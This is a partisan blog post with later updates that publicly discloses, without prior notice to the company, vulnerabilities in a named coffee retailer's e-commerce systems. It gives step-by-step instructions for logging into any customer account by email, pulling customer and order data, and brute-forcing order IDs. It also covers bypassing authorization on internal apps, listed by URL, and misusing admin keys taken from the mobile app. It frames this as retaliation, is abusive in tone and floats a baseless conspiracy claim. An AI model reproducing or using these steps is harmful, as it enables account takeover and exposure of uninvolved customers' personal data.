Black Rifle Coffee Company: Zero Ethics, Zero Security

By , in Current Events Rants on . Tagged width: ,


11/29 Update from Security Researcher:

Please note that at no point in time did anyone at FMShooter steal, sell, hack, or otherwise use BRCC customer data.

The exploits listed in this blog post have existed for years (the Shopify admin keys are in mobile app versions dating back to 2018), so your data was likely compromised by someone else in that time frame.

All FMShooter has done is test their validity and report on them, causing them to be patched, meaning the exploits no longer work.

Black Rifle Coffee Company and Evan Hafer, embarrassed and angry, have decided to label us as “cyber criminals,” a dangerous precedent to set for non-fake-news security researchers reporting on exploits that have fueled real cyber criminals to DOX and harass you (BRCC’s customers) for YEARS.

Who would have thought grifters would have no sense of personal responsibility? Shame on Evan Hafer, and shame on the Black Rifle Coffee Company.


Let’s start with the big reveal, if you have ever had an account with Black Rifle Coffee Company, or have ever placed an order with them, your personal information is at risk. This does NOT include passwords and payment data (to my knowledge).

The Black Rifle Coffee Company is once again getting headlines over its treatment of Kyle Rittenhouse, the 17-year-old hero who shot two criminals (one of whom being a serial child rapist) dead and took a bicep off another. BRCC’s CEO, Evan Hafer, liked a Tweet calling Rittenhouse a “LARPer,” a “punk ass,” and “a wannabe douchebag.” He called those protecting their private property from rioters “repugnant.” He has also been caught donating to Act Blue, and Barack Obama:

Whenever a company pulls something like this, I like to take a quick look at their network infrastructure and security, in hopes that I get to write a blog post embarrassing them. As a summary, in case you don’t want to read the entire in-depth analysis of their network:

  • All BRCC customer data is available for anyone to access, excluding passwords (handled by Shopify) and payment data (handled by Stripe)
  • You can login as any BRCC customer without their password. You can edit profiles, place orders, and edit subscriptions just by knowing their email.
  • You can brute force customer emails using an internal API for looking up orders. This also includes (partial) payment data, tracking numbers, and more identifiers
  • You are able to see every time an employee discount is used, without logging in.
  • You could fuck with their custom Shopify integrations, but this probably won’t do much
  • Other unsolved discoveries include
    • Other internal BRCC tools (*.apps.blackriflecoffee.com)
    • A potential querying endpoint: https://data.blackriflecoffee.com/
    • A potential querying endpoint: https://apps.customers.blackriflecoffee.com/
    • B2B sales platform: https://dealer.blackriflecoffee.com

Usually, these would be reported through HackerOne, or another kind of bug bounty program. This kind of program would report the exploit to the company directly so they could fix it before a blog post about it is published, and would award a cash prize to whoever found the bug. However, as BRCC didn’t give Kyle a chance for his case to be heard before damning him, we, in turn, are foregoing the cash prize and not waiting to divulge this exploit. Call it karma.

A Warning

🛑 Do not perform these steps yourself unless you are well-versed in keeping your online identity secure. These are provided for security researchers to verify and explore, and are for educational purposes only. These tutorials assume basic knowledge of application development. For anyone else, just look at the pictures.

A Prerequisite

🛑 Do not use information retrieved via the exploits to steal BRCC’s customer data. Their customers are not at fault here. Limit your exploration to [email protected], or, if necessary, an unused @blackriflecoffee.com account.

The Goldmine

I took a look into the BRCC mobile application, not expecting to find anything. To my surprise, they embedded their Shopify admin keys inside their public mobile application, so if you have the mobile app installed, admin access to Black Rifle Coffee exists on your device.

These keys cannot be used to edit their customer-facing website unfortunately, but they can be used to create/edit/delete orders, subscriptions, and customers. Also note the Stripe keys here are not sensitive and are usually included in frontend applications. They are the exception. I redacted the ReCharge keys as too much of them were exposed in the screenshot.

Also embedded are keys to their subscription platform, RechargeApps, an old (?) notification platform, Shopistry, and a custom application for push notifications, located at https://black-rifle-coffee.herokuapp.com. Each of these require more investigation.

 

The Exploits

1. Login as Any Customer

This one is so easy to perform that it is incredible it has not been found before.

  1. Send a POST request to https://account.blackriflecoffee.com/login with a JSON body consisting of `{“email”: “[email protected]”}`
  2. You will receive a URL as a response.
    1. (optional) – This URL contains a Shopify Multipass token, exchange that multipass token for a regular Shopify access token using the Shopify REST API.
    2. (optional) – on account.blackriflecoffee.com, set your `shopify_customerToken` cookie to be the regular Shopify access tokenYou now have access to any user’s account.blackriflecoffee.com account.
  3. Click the URL
  4. You will now be in a hidden internal BRCC tool with the user’s profile pulled up. You can make any edits you would like.

From here, you can edit profiles, place orders, edit subscriptions, edit addresses. Free coffee, I guess? Their coffee is kinda shit though, so this is mostly for fun.

2. See Detailed Customer Data

  • Send a GET request to one of the following, replacing the email in the URL with any BRCC customer:

3. See Detailed Order Data

  • Send a GET request to https://account.blackriflecoffee.com/api/order/2760367571053. It may take a few tries to generate valid order IDs, but you can write a program to do this automatically.

4. Get a Bunch of Valid Order IDs

For some context, there are a bunch of internal tools BRCC uses to communicate between Shopify and their own systems. One such tool is located at https://apps.empdiscount.blackriflecoffee.com/. Note that this might give you an “Unauthorized” error, but you can quickly get around that by adding a `?` to the URL to fake a query parameter. So https://apps.empdiscount.blackriflecoffee.com/?. Lol.

Here you can get the details of anyone who has ever used an employee discount code. It’s in a UI so no instructions needed.

5. Fuck Around

There are a bunch of other internal apps like the employee discount one. They don’t do anything special, but I’m sure it breaks something, somewhere:

  • https://apps.inventory.blackriflecoffee.com/?
  • https://apps.inventory.blackriflecoffee.com/?
  • https://apps.ghfulfillment.blackriflecoffee.com/?
  • https://apps.fulfillment.blackriflecoffee.com/?
  • https://apps.stickerclub.blackriflecoffee.com/?

There are others, but there isn’t a traditional UI attached to them so they will need further investigation by others who have time on their hands

Conclusion

Seems to me that Evan Hafer and the rest of BRCC should spend less time attacking minors on Twitter, and more time ensuring their customers are safe while shopping for their sub-par coffee.

Personally, I prefer https://stockingmillcoffee.com/ (https://twitter.com/smcroasters)

If you’re a security researcher who has found something else related to BRCC, feel free to reach out, and we’ll update this article and credit appropriately.


Editor’s Note from FMShooter

Black Rifle Coffee Company should be extremely thankful that the author has the goodness in his heart not to abuse their very visible exploits in their website and payments processing, instead choosing to publicly share his findings via a blog post. A worse human being would have extracted all possible data and sold it to the highest bidder. A slightly less worse human being would have changed every customer’s name before mass placing orders to all of them indicating their true feelings for BRCC and Evan Hafer, this example being sent only to the test account mentioned above:

If BRCC had just spent less time and money commenting on politically charged court cases and contributing to political super PACS, they may have had the resources to develop a customer-facing website that wasn’t a complete security-riddled piece of shit, and the author would never have been able to write this post at all.

This blog may not have much reach, but if Hafer or any BRCC employees ever get a chance to view this post, they should take it as a humbling experience and a learning lesson to not piss all over your customer base. More likely, he will cry like a pansy, and blame “the Drumpftards” for daring to take a cursory look at his disdain for not only his customers, but his customer security.


11/25 Update from FMShooter

Black Rifle Coffee Company sent out a mass email to all of their customers following the publishing of our article:

Black Rifle Coffee is a company founded and led by veterans, with a mission of serving premium coffee to those who love America, so that we can give back to and support our vets and their families. Since founding in 2014, we’ve built a large community of people who, like you, support this mission. Unfortunately, there are those out there who don’t. We have learned that an individual is claiming to have exploited a vulnerability to gain access to the ecommerce platform used by Black Rifle Coffee. As soon as we learned of this issue, we immediately launched an investigation and moved swiftly to notify law enforcement. We also immediately implemented new security measures to further protect the platform.

There is no indication that any of our customers’ passwords or payment information was compromised. We will continue investigating and will provide an update if that changes. Sadly, un-American attacks like these are common, and we stand ready to support law enforcement’s continued efforts against cyber criminals. Please know that we care deeply about your privacy, and that we prioritize the safety, security, and privacy of your shopping experience. We will not be deterred in our mission to serve our fellow military service members, veterans, and patriots. We appreciate your support, and we wish you a fantastic Thanksgiving week.

Black Rifle Coffee Company

Well, it appears we did get BRCC’s attention with this post. And they have responded as expected; crying like pansies and referring to us as “un-American” (how they view “the Drumpftards” anyway).

News flash, dickheads – maybe if you weren’t such un-American pricks to your customer base and spent that time shoring up your security, no one would have even been able to investigate the website. 

We’ll still respond to a few of their points:

As soon as we learned of this issue, we immediately launched an investigation and moved swiftly to notify law enforcement.

Funny, no one at BRCC ever bothered to notify us. And it’s not like we’re hard to find. Oh, and neither did law enforcement. Maybe that’s because we broke precisely zero laws in publishing a blog post containing public information about BRCC’s godawful website security?

We also immediately implemented new security measures to further protect the platform.

Yes, BRCC most certainly did implement new security measures – they revoked permissions for the Shopify admin keys, which apparently causes their entire mobile app to crash, and disabled all their internal apps. If their idea of “new security measures” involves nuking their mobile app and internal apps, they should consider hiring all-new development and security teams.

There is no indication that any of our customers’ passwords or payment information was compromised.

Well no shit, sherlock – the article stated that passwords and payment info were handled by Shopify and Stripe respectively, who at least seem to care about security. Only problem with BRCC’s lack of disclosure is that all other customer information has been publicly available for quite some time now. Funny that BRCC decided to leave that out of their email – especially considering the fact that their customer base, including many current and former military and LEO members – is uber-paranoid about their own personal information and security.

Sadly, un-American attacks like these are common, and we stand ready to support law enforcement’s continued efforts against cyber criminals.

Sadly, un-American piece of shit coffee companies like BRCC are common, and we stand ready to support law enforcement’s continued efforts to boycott and punish BRCC financially for their customer abuse and mistreatment.

Please know that we care deeply about your privacy, and that we prioritize the safety, security, and privacy of your shopping experience.

While we never like to chalk up to malice what can be attributed to incompetence – before publishing this article, we did consider that perhaps BRCC was a honeypot fed-trap operation all along, designed purposefully to expose their customer information to malicious actors for easy access. Given the leftist/globalist leanings of BRCC, and their disdain for their own customers, we can’t discount the possibility that the BRCC staff set up the company for the deliberate purpose of outing their customers. We’ll leave it to others more saavy or in-the-know than us to publish the truth on the BRCC malice/incompetence question.

 

Since Hafer never bothered to reach out to us, choosing instead to send an email blast to his full customer list, we feel confident in our assessment that he deserved his rekage. We are ready to cooperate with law enforcement should they reach out, though as indicated above, we are not expecting to hear anything but crickets.